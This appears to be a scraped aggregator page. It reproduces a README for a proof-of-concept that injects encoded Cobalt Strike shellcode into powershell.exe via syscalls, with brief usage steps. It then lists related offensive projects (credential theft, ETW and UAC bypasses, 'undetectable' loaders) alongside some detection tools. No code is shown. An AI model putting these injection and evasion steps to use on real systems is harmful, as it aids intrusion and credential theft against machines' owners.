EarlyBird: a poc of using the tech with syscalls on powershell.exe

Overview

EarlyBird: a poc of using the tech with syscalls on powershell.exe

injecting cobalt strike shellcode to powershell.exe using EarlyBird Tech

image

USAGE:

  • first get ur self a nice profile
  • generate ur x64 https shellcode (in c format)
  • paste it in encoder.py and run it using python2
  • copy and paste the output to here
  • if u changed the key, change it in main.cpp too

DEMO:

DEMO.mp4

Based on:

image

You might also like...
Extracting clear-text passwords from VeraCrypt.exe using API Hooking
Extracting clear-text passwords from VeraCrypt.exe using API Hooking

VeraCryptThief VeraCryptThief by itself is a standalone DLL that when injected in the VeraCrypt.exe process, will perform API hooking via Detours, ext

CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)
CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)

Cobalt Strike BOF - Inject ETW Bypass Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate) Running InjectEtwBypass BOF from Cobalt

CredBandit - Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel

CredBandit CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process a

Inject dll to explorer.exe and hide file from process.

Hide-FS Inject dll to explorer.exe and hide file from process. Requierments: Microsoft Detours Library - https://github.com/microsoft/Detours Compile:

Assembly HellGate implementation that directly calls Windows System Calls and displays the PPID of the explorer.exe process
Assembly HellGate implementation that directly calls Windows System Calls and displays the PPID of the explorer.exe process

Custom HellsGate Implementation Assembly HellGate implementation that directly calls Windows System Calls and displays the PPID of the explorer.exe pr

A port of the FNF Sonic.EXE mod to PS1. (Sunky and Multiplayer Update)

PSXFunkin VS Sonic.EXE on the PS1 ooga booga hes gonna getcha Compilation Refer to COMPILE.md here Disclaimer This project is not endorsed by the orig

Protect files under a specific folder from deleting or moving by explorer.exe.
Protect files under a specific folder from deleting or moving by explorer.exe.

Explorer-Delete-Protection Protect files under a specific folder from deleting or moving by explorer.exe. Requierments: Microsoft Detours Library - ht

Inject dll to cmd.exe to prevent file execution.

Console-Process-Execution Inject dll to cmd.exe to prevent file execution. Requierments: Microsoft Detours Library - https://github.com/microsoft/Deto

idf.py.exe, wrapper tool to invoke idf.py on Windows

IDF wrapper tool (idf.py.exe) This tools helps invoke idf.py in Windows CMD shell. In Windows CMD shell, python scripts can be executed directly (by t

Owner
YOUR CODE IS ONLY LIMITED BY YOUR IMAGINATION
null
PoC capable of detecting manual syscalls from usermode.

syscall-detect PoC capable of detecting manual syscalls from usermode. More information available at: https://winternl.com/detecting-manual-syscalls-f

null 124 Nov 25, 2022
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

HOLLOW - Cobalt Strike BOF Authors: Bobby Cooke (@0xBoku) Justin Hamilton (@JTHam0) Octavio Paguaga (@OakTree__) Matt Kingstone (@n00bRage) Beacon Obj

Bobby Cooke 201 Nov 12, 2022
A UAC bypass written in powershell

Powershell UAC bypass Originally discovered by Daniel Gebert Table of Contents Deployment Explanations What is UAC? DLL Hijacking Mock Directories Aut

Matt 3 Sep 28, 2021
Another version of EVA using anti-debugging techs && using Syscalls

EVA2 Another version of EVA using anti-debugging techs && using Syscalls First thing: Dont Upload to virus total. this note is for you and not for me.

null 270 Nov 9, 2022
EVA3: using hellsgate in EVA to get the syscalls [tested with cobalt strike 4.3]

EVA3: using hellsgate in EVA to get the syscalls [tested with cobalt strike 4.3] note that i dont claim that the idea is mine, this repo is probably

null 32 Oct 29, 2022
Undetectable Loader for Cobalt Strike Using Syscalls And A External Shellcode

Hellsgate Undetectable Loader for Cobalt Strike Using Syscalls And A External Shellcode Features: Using Syscalls from Hellsgate tech loading the shell

JUICY 21 Nov 5, 2021
A tool for detecting manual/direct syscalls in x86 and x64 processes using Nirvana Hooks.

manual-syscall-detect A tool for detecting manual/direct syscalls in x86 and x64 processes using Nirvana Hooks. Description A full write-up of this to

Conor Richard 71 Nov 17, 2022
The C source code was RESTORED by disassembling the original executable file OPTIM.COM from the Hi-Tech v3.09 compiler.

The C source code was RESTORED by disassembling the original executable file OPTIM.COM from the Hi-Tech v3.09 compiler. This file is compiled by Hi-Te

null 10 Nov 14, 2022
(for Casio ClassPad II fx-CP400, with hollyhock) tech demo thing containing useful functions

here's ponggers2, mainly a tech demo to show off the trig functions, fps display, texture and font conversion, texture and text (with the custom fonts

InterChan 3 Jan 15, 2022
Second version of the decompiled C code of the CGEN.COM from HI-TECH C compiler V3.09

dcgenv2 Second version of the decompiled C code of the CGEN.COM from HI-TECH C compiler V3.09 This repository contains the second version of the decom

null 6 Sep 18, 2022